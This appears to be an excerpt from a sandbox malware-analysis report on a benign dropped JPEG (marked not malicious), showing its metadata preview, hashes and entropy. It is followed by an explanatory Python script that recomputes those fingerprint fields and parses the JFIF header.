                Preview:......JFIF.....,.,....2$http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS6 (Macintosh)</xmp:CreatorTool>. <xmp:CreateDate>2017-08-31T23:23:15Z</xmp:CreateDate>. <xmp:ModifyDate>2017-08-31T23:24:24Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. . .
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, progressive, precision 8, 1100x600, components 3
                Category:dropped
                Size (bytes):257825
                Entropy (8bit):7.968607322621273
                Encrypted:false
                SSDEEP:
                MD5:E50BC618EDCFF4E01F09E562A458AF3D
                SHA1:2C77BB47DE94DC545E345FD7B47F4E2B872EA7AE
                SHA-256:5FE8D3BF8875AA5714762D66FCB6E0AD1C48033CABBC3D5F12BA7DDF27DBC083
                SHA-512:831AA06C24F30E8E88B5551026EBAF1582FBE9589BC85D9BA876F80E89761B3E4BB61C21D60D4EE4B3044BD500021F13E198D5964355D7E6FDB74784E12FA57B
                Malicious:false
                Reputation:unknown
                Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
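The per-file fields above (File Type, Size, Entropy (8bit), Encrypted, the four hashes and the dotted Preview) are what an analyst recomputes when recovering an artifact from the sandbox or from a host and checking it against this report. The following script is an added illustration, not Joe Sandbox code: it rebuilds those fields for a file, parses the JFIF APP0 segment to reproduce the `file(1)`-style "JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16" description, and renders the same printable-ASCII-or-dot preview. The sample inputs are constructed in the script (a JFIF header over a zero-filled body, and a uniform byte stream), and the `Encrypted` rule is this example's own heuristic (assumption): high entropy is only flagged when no known container is recognised, because a JPEG scan such as the 257825-byte image above sits at 7.97 bits/byte while being merely compressed, whereas the 103x32 Fireworks images come in under 3 bits/byte because of their low-entropy XMP packet. SSDEEP, Category, Malicious and Reputation are verdict or context fields and are not computed here.

```python
"""Recompute sandbox-style dropped-file fingerprint fields (added example, not report code)."""
import hashlib
import math
import sys
from collections import Counter

# JFIF APP0 layout: SOI FFD8, marker FFE0, 2-byte segment length, "JFIF\0",
# version major/minor, density units (1 = DPI), X density, Y density, thumbnail w/h.
JFIF_HEADER_72DPI = bytes.fromhex(
    "FFD8FFE0" "0010" "4A46494600" "0101" "01" "0048" "0048" "0000"
)
# Constructed inputs (not files from the report): a JFIF header over a zero-filled
# body (low entropy) and a uniform byte stream (maximal entropy, no container).
LOW_ENTROPY_JPEG = JFIF_HEADER_72DPI + b"\x00" * 4096
HIGH_ENTROPY_BLOB = bytes(range(256)) * 8

DENSITY_UNITS = {0: "aspect ratio", 1: "DPI", 2: "dots/cm"}
ENTROPY_ENCRYPTED_THRESHOLD = 7.9  # assumed threshold for this example only


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant stream, 8.0 for a uniform one."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_like_jfif(data: bytes) -> bool:
    """True when the data opens with SOI and an APP0 segment carrying the 'JFIF' identifier."""
    return len(data) >= 20 and data[:4] == b"\xff\xd8\xff\xe0" and data[6:11] == b"JFIF\x00"


def describe_jfif(data: bytes):
    """Rebuild the file(1)-style 'File Type' string the report prints for JFIF files."""
    if not looks_like_jfif(data):
        return None
    seg_len = int.from_bytes(data[4:6], "big")
    major, minor = data[11], data[12]
    units = DENSITY_UNITS.get(data[13], "unknown units")
    xdens = int.from_bytes(data[14:16], "big")
    ydens = int.from_bytes(data[16:18], "big")
    return (f"JPEG image data, JFIF standard {major}.{minor:02d}, "
            f"resolution ({units}), density {xdens}x{ydens}, segment length {seg_len}")


def preview(data: bytes, limit: int = 1024) -> str:
    """Render the leading bytes like the report's 'Preview': printable ASCII kept, the rest as '.'."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in data[:limit])


def fingerprint(data: bytes) -> dict:
    """Compute the report-style fields. 'Encrypted' is raised only for high entropy in an
    unrecognised container: entropy alone cannot separate compressed from encrypted bytes."""
    entropy = shannon_entropy_8bit(data)
    file_type = describe_jfif(data)
    return {
        "File Type": file_type or "data",
        "Size (bytes)": len(data),
        "Entropy (8bit)": entropy,
        "Encrypted": file_type is None and entropy > ENTROPY_ENCRYPTED_THRESHOLD,
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
        "Preview": preview(data, 64),
    }


def matches_report(data: bytes, expected_sha256: str) -> bool:
    """Check a recovered artifact against the SHA-256 listed in a report (case-insensitive)."""
    return hashlib.sha256(data).hexdigest().lower() == expected_sha256.strip().lower()


if __name__ == "__main__":
    # With no arguments the constructed samples are fingerprinted; file paths may be added.
    samples = {"constructed-jfif": LOW_ENTROPY_JPEG, "constructed-blob": HIGH_ENTROPY_BLOB}
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            samples[path] = fh.read()
    for name, blob in samples.items():
        print(f"== {name}")
        for field, value in fingerprint(blob).items():
            print(f"{field}:{value}")
```

Run it against the downloaded `login.jpg` and the dropped copy to see why the report lists them as two distinct artifacts: same dimensions and density, but different sizes, hashes and XMP ModifyDate. The preview format also explains the dotted headers above: `......JFIF.....H.H` is a 72x72 DPI header (0x0048 renders as `.H`) and `......JFIF.....,.,` is 300x300 (0x012C renders as `.,`).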
                No static file info